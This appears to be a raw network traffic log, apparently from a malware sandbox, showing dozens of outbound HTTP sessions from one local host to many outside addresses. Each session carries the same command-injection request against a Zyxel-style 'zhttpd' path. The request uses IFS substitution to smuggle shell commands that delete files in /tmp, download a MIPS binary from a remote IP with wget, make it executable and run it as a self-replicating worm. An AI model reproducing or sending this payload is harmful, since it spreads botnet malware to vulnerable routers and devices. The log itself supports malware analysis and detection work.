                                      Jan 14, 2024 15:50:42.207479954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3277192.168.2.1455228200.78.94.227443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.207513094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3278192.168.2.1444964200.49.158.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.207556963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3279192.168.2.144742249.200.53.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.207603931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3280192.168.2.1440084109.210.0.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.207643032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3281192.168.2.145781025.201.114.218443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.207704067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3282192.168.2.1452508171.38.44.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.207751989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3283192.168.2.144813239.111.5.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.207811117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3284192.168.2.1441558199.209.52.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.207886934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3285192.168.2.143710613.20.148.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.207940102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3286192.168.2.1439960162.251.202.132443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.207994938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3287192.168.2.145305847.236.199.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.208044052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3288192.168.2.146071874.172.54.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.208096981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3289192.168.2.1454026182.6.194.116443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.208149910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3290192.168.2.1453064158.60.71.50443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.208195925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3291192.168.2.1443430134.4.254.58443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.208261967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3292192.168.2.145969089.211.79.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.208334923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3293192.168.2.145495851.50.116.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.208403111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3294192.168.2.1433612212.113.103.52443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.208451986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3295192.168.2.1446258182.184.249.121443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.208492994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3296192.168.2.1434066202.179.216.203443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.208549976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3297192.168.2.145881086.193.251.234443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.208604097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3298192.168.2.1441582166.239.67.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.208681107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3299192.168.2.1458954185.36.141.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.208744049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3300192.168.2.1432876164.75.189.153443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.208795071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3301192.168.2.1435092211.23.1.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.208849907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3302192.168.2.1457108185.17.90.118443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.208905935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3303192.168.2.1456948192.114.198.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.208973885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3304192.168.2.1451526167.136.225.14443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.209013939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3305192.168.2.1447026132.100.5.54443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.209090948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3306192.168.2.144456837.123.13.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.209130049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3307192.168.2.1458562186.11.102.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.209189892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3308192.168.2.1436056197.83.30.176443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.209229946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3309192.168.2.143748018.200.212.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.209276915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3310192.168.2.1452984201.189.180.45443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.209347963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3311192.168.2.144258647.146.161.251443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.209413052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3312192.168.2.1439606107.180.244.141443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.209446907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3313192.168.2.1445220113.18.13.237443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.209517002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3314192.168.2.1438720218.206.248.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.209589958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3315192.168.2.1435844147.222.44.218443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.209641933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3316192.168.2.1449768181.60.237.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.209693909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3317192.168.2.1448246101.228.45.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.209726095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3318192.168.2.1435536162.83.153.141443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.209780931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3319192.168.2.1454182119.216.253.21443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.209820986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3320192.168.2.1434240189.143.91.215443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.209914923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3321192.168.2.144538436.187.234.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.209924936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3322192.168.2.143366889.54.232.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.209952116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3323192.168.2.1449742196.201.203.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.210038900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3324192.168.2.1458896158.68.224.102443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.210093975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3325192.168.2.144246666.145.244.249443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.210134983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3326192.168.2.145923820.150.200.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.210192919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3327192.168.2.145161823.87.244.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.210252047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3328192.168.2.1449950126.246.158.229443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.210304022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3329192.168.2.144430252.7.13.167443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.210355043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3330192.168.2.1442484157.213.221.155443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.210391998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3331192.168.2.143345080.73.37.11443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.210462093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3332192.168.2.1435302176.246.15.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.210504055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3333192.168.2.145027648.245.50.58443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.210532904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3334192.168.2.143586454.199.3.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.210611105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3335192.168.2.145558059.145.222.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.210649967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3336192.168.2.1436096180.238.170.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.210737944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3337192.168.2.1442190110.2.125.121443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.210808992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3338192.168.2.1454326191.54.78.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.210875034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3339192.168.2.145273279.147.195.58443
                                      TimestampBytes transferredDirectionData
